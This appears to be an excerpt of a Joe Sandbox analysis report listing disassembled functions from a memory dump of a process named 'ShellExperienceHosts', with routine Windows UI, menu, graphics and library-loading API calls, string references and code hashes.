Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ObjectPixel$Select$CompatibleCreateH_prolog3_
String ID:
API String ID: 1266819874-0
Opcode ID: a9b8416482fa8a68f2660e5408e979f8992c9e9435bcac16487c734ffc71d383
Instruction ID: 8bd01b27071b12358be35cea5903b6d01055716d3c060c7773b006db8619cc64
Opcode Fuzzy Hash: a9b8416482fa8a68f2660e5408e979f8992c9e9435bcac16487c734ffc71d383
Instruction Fuzzy Hash: 46810A75E002299BDF20CFA9C894A9DBBB6BF49304F248169E85DE7741DB309D86CF50

Function 6C9F4710 Relevance: 15.2, APIs: 10, Instructions: 163timeCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 6C9F4733
ScreenToClient.USER32(?,?), ref: 6C9F4740
KillTimer.USER32(?,0000EC17), ref: 6C9F4758
PtInRect.USER32(?,?,?), ref: 6C9F4787
KillTimer.USER32(?,0000EC18), ref: 6C9F4816
GetParent.USER32(?), ref: 6C9F482B
PtInRect.USER32(?,?,?), ref: 6C9F4857
KillTimer.USER32(?,0000EC07), ref: 6C9F48B6
GetClientRect.USER32(?,?), ref: 6C9F48CA
PtInRect.USER32(?,?,?), ref: 6C9F48DA

Part of subcall function 6C9BE89F: ShowWindow.USER32(?,?,00000000,?,6C9C24AD,00000000,?,?,?,?,?,?,?,6C9C1FF8,00000000,000000FF), ref: 6C9BE8B0

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$KillTimer$Client$CursorParentScreenShowWindow
String ID:
API String ID: 966434589-0
Opcode ID: 32bf14eb8bfbae5bdf60e663684049fcbbd3a6822441feb64cce26952331d672
Instruction ID: 2e8296bafb5d4cc15d5ffe31d3ba608629c97fa0608cda60b64e091241abf6ea
Opcode Fuzzy Hash: 32bf14eb8bfbae5bdf60e663684049fcbbd3a6822441feb64cce26952331d672
Instruction Fuzzy Hash: 5651D634B0065AEFDF198F60D9449AEBBB9FF09705F144216E929A3600DB34E952CF94

Function 6C9C295E Relevance: 15.1, APIs: 10, Instructions: 149windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9C2968
GetMenuItemCount.USER32(?), ref: 6C9C2994
GetSubMenu.USER32(?,00000000), ref: 6C9C29CA
GetMenuState.USER32(?,?,00000400), ref: 6C9C29E7
GetSubMenu.USER32(?,00000000), ref: 6C9C2A44
GetMenuStringW.USER32(?,?,?,00000100,00000400), ref: 6C9C2A6D
AppendMenuW.USER32(00000000,00000010,00000000,?), ref: 6C9C2AF5
GetMenuItemCount.USER32(00000000), ref: 6C9C2B65
InsertMenuW.USER32(?,00000000,?,00000000), ref: 6C9C2B92
GetMenuItemID.USER32(?,?), ref: 6C9C2BC3

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Menu$Item$Count$AppendH_prolog3_InsertStateString
String ID:
API String ID: 2171526683-0
Opcode ID: 116bec2a284ac5d9652d86769360391b098a797d4183148e3d26ed08217f4e90
Instruction ID: 923a5e0315e54d1a22da3ff116988061d6cd694c4e129f386af0be5c971e6815
Opcode Fuzzy Hash: 116bec2a284ac5d9652d86769360391b098a797d4183148e3d26ed08217f4e90
Instruction Fuzzy Hash: E161E271A41229AFDF24DF54DD8CBDDB7B9AF28304F1050E9E409A6290DB349E85CF52

Function 6C9DCB1D Relevance: 15.1, APIs: 10, Instructions: 103COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,00000000,?,?), ref: 6C9DCB3C
GetWindowRect.USER32(?,?), ref: 6C9DCB5B
SetRect.USER32(?,?,00000000,?,?), ref: 6C9DCB9A
InvalidateRect.USER32(?,?,00000001), ref: 6C9DCBA9
SetRect.USER32(?,?,00000000,?,?), ref: 6C9DCBC1
InvalidateRect.USER32(?,?,00000001), ref: 6C9DCBD0
SetRect.USER32(?,00000000,?,?,?), ref: 6C9DCBF8
InvalidateRect.USER32(?,?,00000001), ref: 6C9DCC07
SetRect.USER32(?,00000000,?,00000001,?), ref: 6C9DCC1E
InvalidateRect.USER32(?,?,00000001), ref: 6C9DCC2D

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$Invalidate$Window$Proc
String ID:
API String ID: 570070710-0
Opcode ID: 19e56d39b645c400ff6c408d091d40d8eb845c3a7c7c8a219b3208fbefca9272
Instruction ID: bec1f04989b326aa8618148eeffd4ce5db2a439b4db6cf96cd8938fddb273115
Opcode Fuzzy Hash: 19e56d39b645c400ff6c408d091d40d8eb845c3a7c7c8a219b3208fbefca9272
Instruction Fuzzy Hash: B9410772A0024AAFDB10DFA4DA89FAFBBBDFF5A704F104119F605A3590D770A944CB61

Function 6C9B6F41 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 118libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Comctl32.dll), ref: 6C9B70D7

Part of subcall function 6C9B6E9D: GetProcAddress.KERNEL32(00000000,00000000), ref: 6C9B6ECB

GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6C9B6FF1
SetLastError.KERNEL32(0000006F), ref: 6C9B7005
GetLastError.KERNEL32 ref: 6C9B705C

Strings

, xrefs: 6C9B7010
@, xrefs: 6C9B70B2
GetModuleHandleExW, xrefs: 6C9B6FA4
Comctl32.dll, xrefs: 6C9B70C3, 6C9B70C8, 6C9B70D6

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ErrorLast$AddressFileLibraryLoadModuleNameProc
String ID: $@$Comctl32.dll$GetModuleHandleExW
API String ID: 3640817601-4183358198
Opcode ID: 8e1f19816795e44e372d44ecc62aff6f5274baa895353b60ab5f47c0363b52fb
Instruction ID: 6d108f0615c771dfca4ff4685864bf81a69b3bc080dccd2a370e78b0b1109aa7
Opcode Fuzzy Hash: 8e1f19816795e44e372d44ecc62aff6f5274baa895353b60ab5f47c0363b52fb
Instruction Fuzzy Hash: 1741B470A02264FADB208B64DC88BAF76BCAB45714F204797E518F7980DB75DA84CF61

Function 6CA4E4B0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 100sleepthreadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CB8F124,?,?,?,6C9EE531,00000001), ref: 6CA4E4D5
SetThreadPriority.KERNEL32(00000000,000000FF), ref: 6CA4E506
LeaveCriticalSection.KERNEL32(6CB8F124), ref: 6CA4E51C
PlaySoundW.WINMM(MenuCommand,00000000,00012002), ref: 6CA4E56D
Sleep.KERNEL32(00000005,?,6CB8F124,?,?,?,?,6C9EE531,00000001), ref: 6CA4E598
PlaySoundW.WINMM(00000000,00000000,00000040), ref: 6CA4E5AD

Strings

MenuCommand, xrefs: 6CA4E57F
MenuPopup, xrefs: 6CA4E568

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CriticalPlaySectionSound$EnterLeavePrioritySleepThread
String ID: MenuCommand$MenuPopup
API String ID: 2370138168-2036262055
Opcode ID: d8dfcba4ac5086267cba57b0a898bb21f94eef8e13a3e5babbc93046c87fc959
Instruction ID: 88a6848c9700614779a356c485d6b834c300912e31262fda32af48a8f14120fa
Opcode Fuzzy Hash: d8dfcba4ac5086267cba57b0a898bb21f94eef8e13a3e5babbc93046c87fc959
Instruction Fuzzy Hash: 2431F5356452409BEB10DA2ADC88B5ABAB8EB83738F644715E438D7DC4D37088858BE3

Function 6C9B897D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6C9B89A3
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C9B89B3
EncodePointer.KERNEL32(00000000,?,00000000), ref: 6C9B89BC
DecodePointer.KERNEL32(00000000,?,00000000), ref: 6C9B89CA
GetSystemDirectoryW.KERNEL32(?,00000105), ref: 6C9B89F2

Strings

SetDefaultDllDirectories, xrefs: 6C9B89AD
kernel32.dll, xrefs: 6C9B899E
\, xrefs: 6C9B8A00

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Pointer$AddressDecodeDirectoryEncodeHandleModuleProcSystem
String ID: SetDefaultDllDirectories$\$kernel32.dll
API String ID: 2101061299-3881611067
Opcode ID: 24908a87b8518794a0c80cc85f4556b82fae0c7fdc00182b2acc73cd921d029b
Instruction ID: dc1b2566ee1062d907e1378677c3e177b6efa295f92bc82ec6f936365ea60d0c
Opcode Fuzzy Hash: 24908a87b8518794a0c80cc85f4556b82fae0c7fdc00182b2acc73cd921d029b
Instruction Fuzzy Hash: 96219971B0135DB7CF149AA59C48BDF37BCAF0A354F18046AE809F3900E770D6488A99

Function 6C9E49EC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 6C9E4A0F
GetStockObject.GDI32(0000000D), ref: 6C9E4A1B
GetObjectW.GDI32(00000000,0000005C,?), ref: 6C9E4A2C
GetDC.USER32(00000000), ref: 6C9E4A3B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 6C9E4A52
MulDiv.KERNEL32(?,00000048,00000000), ref: 6C9E4A5E
ReleaseDC.USER32(00000000,00000000), ref: 6C9E4A6A

Strings

System, xrefs: 6C9E4A05, 6C9E4A7F

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: e41bd0256872fc37af92dd0a8a194acf1eab1335813f01ebb6db13bc641e4609
Instruction ID: b779365359980eb5eecadda60c0d63f4add95e0a8695d459ea56cd2a1a72bb7d
Opcode Fuzzy Hash: e41bd0256872fc37af92dd0a8a194acf1eab1335813f01ebb6db13bc641e4609
Instruction Fuzzy Hash: B2117F71740358ABEB259BA5DC89FAE7BB8EF5A755F000019F50AEB280DB70C905DB24

Function 6C9E49ED Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 6C9E4A0F
GetStockObject.GDI32(0000000D), ref: 6C9E4A1B
GetObjectW.GDI32(00000000,0000005C,?), ref: 6C9E4A2C
GetDC.USER32(00000000), ref: 6C9E4A3B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 6C9E4A52
MulDiv.KERNEL32(?,00000048,00000000), ref: 6C9E4A5E
ReleaseDC.USER32(00000000,00000000), ref: 6C9E4A6A

Strings

System, xrefs: 6C9E4A05, 6C9E4A7F

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: 33ef27a410dedbae80cb398eae309b93ac9224d16605a2e37b177d80b99c7c57
Instruction ID: aeffdcc2af818f5d88506ebd44c55a5fcc2384671c384eb14daa361fbca757f4
Opcode Fuzzy Hash: 33ef27a410dedbae80cb398eae309b93ac9224d16605a2e37b177d80b99c7c57
Instruction Fuzzy Hash: 81117F71700358ABEB159AA5DC49FAE7BBCEF59B15F000019F50AEB280DB70D905DA64

Function 6C9B9BAB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 6C9B9BF2
SetActiveWindow.USER32(?), ref: 6C9B9BFD
SendMessageW.USER32(?,00000112,?,?), ref: 6C9B9C17
IsWindow.USER32(?), ref: 6C9B9C1E
SetActiveWindow.USER32(?), ref: 6C9B9C29
IsWindow.USER32(00000000), ref: 6C9B9C30
SetFocus.USER32(00000000), ref: 6C9B9C3B

Strings

u, xrefs: 6C9B9C44

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Window$ActiveFocus$MessageSend
String ID: u
API String ID: 1556911595-4067256894
Opcode ID: c14beba5ecd5204719668d06499d6eaee7a166f5e7c7fe4d94be300f272fdad0
Instruction ID: 8da2e28a05addfaf979abcac0ec3df27318bae53792d2d7ef5c2f1b997828092
Opcode Fuzzy Hash: c14beba5ecd5204719668d06499d6eaee7a166f5e7c7fe4d94be300f272fdad0
Instruction Fuzzy Hash: 01110432221604BBEB211E74C98966F3AFDEF36308B228524E91DAA949CB34E4009B50

Function 6C9C0EF3 Relevance: 13.7, APIs: 9, Instructions: 185windowCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9D17DE: GetFocus.USER32 ref: 6C9D17E2
Part of subcall function 6C9D17DE: GetParent.USER32(00000000), ref: 6C9D1803
Part of subcall function 6C9D17DE: GetWindowLongW.USER32(?,000000F0), ref: 6C9D1822
Part of subcall function 6C9D17DE: GetParent.USER32(?), ref: 6C9D1830
Part of subcall function 6C9D17DE: GetDesktopWindow.USER32 ref: 6C9D1838
Part of subcall function 6C9D17DE: SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 6C9D184C

GetMenu.USER32(?), ref: 6C9C0F74
GetMenuItemCount.USER32(?), ref: 6C9C0FB2
GetSubMenu.USER32(?,00000000), ref: 6C9C0FC8
GetMenuItemCount.USER32(?), ref: 6C9C0FED
GetMenuItemID.USER32(?,00000000), ref: 6C9C1007
GetSubMenu.USER32(?,?), ref: 6C9C1023
GetMenuItemID.USER32(?,00000000), ref: 6C9C103B
GetMenuItemCount.USER32(?), ref: 6C9C105C
GetMenuItemID.USER32(?,?), ref: 6C9C1092

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
String ID:
API String ID: 4186786570-0
Opcode ID: 9a8b76ae3c4d92ce48b5b3b32137d0e4e9109411081fdae78f81d76e8fb6daad
Instruction ID: 1ed8aa912662a525e1d8879d069a7c3bfdde75dac1bf0c6759c97d817a6b2902
Opcode Fuzzy Hash: 9a8b76ae3c4d92ce48b5b3b32137d0e4e9109411081fdae78f81d76e8fb6daad
Instruction Fuzzy Hash: 3C61AE70B00245EFDB01DF64C994AADBBB9FF5A314F108125E825A7690DB30E890DFA7

Function 6C9DC972 Relevance: 13.7, APIs: 9, Instructions: 151timekeyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000001), ref: 6C9DC97D
GetCursorPos.USER32(?), ref: 6C9DC9A2
ScreenToClient.USER32(?,?), ref: 6C9DC9AF
GetCapture.USER32 ref: 6C9DCA21
ClientToScreen.USER32(?,?), ref: 6C9DCA64
WindowFromPoint.USER32(?,?), ref: 6C9DCA70
IsChild.USER32(?,?), ref: 6C9DCA88
KillTimer.USER32(?,0000EC0A), ref: 6C9DCAC8
KillTimer.USER32(?,0000EC09), ref: 6C9DCAF1

Part of subcall function 6C9B9EBC: GetForegroundWindow.USER32 ref: 6C9B9EC9
Part of subcall function 6C9B9EBC: GetLastActivePopup.USER32(?), ref: 6C9B9EDA

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ClientKillScreenTimerWindow$ActiveCaptureChildCursorForegroundFromLastPointPopupState
String ID:
API String ID: 3566347107-0
Opcode ID: 37d518478c82a8090cef928efd79829b5153af4682db077b6c588ec0e934cb0a
Instruction ID: 0b17d904306033281783b5ed8ec64e18bdc849acd3f7717d614d79d141748844
Opcode Fuzzy Hash: 37d518478c82a8090cef928efd79829b5153af4682db077b6c588ec0e934cb0a
Instruction Fuzzy Hash: 90518170B00619EFDF05EFA4C9949ADBBB9BF58344B1241A9E816F7650EB70ED00DB90

Function 6C9C2BD7 Relevance: 13.6, APIs: 9, Instructions: 89windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C9C2BDE
GetMenuItemCount.USER32(?), ref: 6C9C2C24
GetMenuItemCount.USER32(6C9CFF05), ref: 6C9C2C30
GetSubMenu.USER32(6C9CFF05,-00000001), ref: 6C9C2C47
GetMenuItemCount.USER32(00000000), ref: 6C9C2C5A
GetSubMenu.USER32(00000000,00000000), ref: 6C9C2C6B
RemoveMenu.USER32(00000000,00000000,00000400,?,?,?,?,6C9CFF05,6CB74188,0000000C,00000004,6C9A1DD8), ref: 6C9C2C85

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Menu$CountItem$H_prolog3Remove
String ID:
API String ID: 3061525546-0
Opcode ID: 94673b4e39b9db1a5148d1ead8d0f5f0208de10b2c67fc500de040544be1a59e
Instruction ID: 81dfeeed3c937bc68e752cab6f1b8f486db2a4a08371abedca9095c49d7da1c6
Opcode Fuzzy Hash: 94673b4e39b9db1a5148d1ead8d0f5f0208de10b2c67fc500de040544be1a59e
Instruction Fuzzy Hash: 3621BF31740649EBDF109F64CD4CA9E7EB9FF62314F1051A9F529E7A80D770CA41CAA2

Function 6C9D653F Relevance: 13.6, APIs: 9, Instructions: 67windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 6C9D655A
GetWindowLongW.USER32(00000000,000000F0), ref: 6C9D6569
IsWindowEnabled.USER32(00000000), ref: 6C9D6577
GetDlgItem.USER32(?,00003024), ref: 6C9D658E
GetWindowLongW.USER32(00000000,000000F0), ref: 6C9D659A
IsWindowEnabled.USER32(?), ref: 6C9D65AA
GetFocus.USER32 ref: 6C9D65CB
IsWindowEnabled.USER32(00000000), ref: 6C9D65D2
SetFocus.USER32(?), ref: 6C9D65DF

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Window$Enabled$FocusItemLong
String ID:
API String ID: 1558694495-0
Opcode ID: 0afe11819f498aa312040b83a4f12ea28b0620a013c7495c0b96cd2b9e1ea3e9
Instruction ID: b10a9ae67d096e17802f776e541d182d2225ab5408c58c4de8ee6b959ead16a0
Opcode Fuzzy Hash: 0afe11819f498aa312040b83a4f12ea28b0620a013c7495c0b96cd2b9e1ea3e9
Instruction Fuzzy Hash: 2C11CD32700911ABDF125F64D84CB5D7B79FF46314F118225F81AE36A4DB31E950DB80

Function 6CA38061 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 261windowCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA39438: GdipGetImagePixelFormat.GDIPLUS(?,6CB8F0A0,00000000,00000000,?,6CA380A5,3E6EA3C2,?,00000000,6CB8F0A0), ref: 6CA39446

Part of subcall function 6CA393F0: GdipGetImagePalette.GDIPLUS(?,00000000,?,?,?,6CA381C4,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,3E6EA3C2), ref: 6CA393FF

GdipBitmapLockBits.GDIPLUS(?,?,00000001,?,?,00000000,00000000,?,00000000,00000000,00000000,3E6EA3C2,?,00000000,6CB8F0A0), ref: 6CA382B9
GdipBitmapUnlockBits.GDIPLUS(?,?,?,?,00000001,?,?,00000000,00000000,?,00000000,00000000,00000000,3E6EA3C2,?,00000000), ref: 6CA38369
GdipDrawImageI.GDIPLUS(?,00000000,00000000,00000000,?,?,00000082,00000000,00022009,?,00000000,00000000,?,00000000,00000000,00000000), ref: 6CA383BB
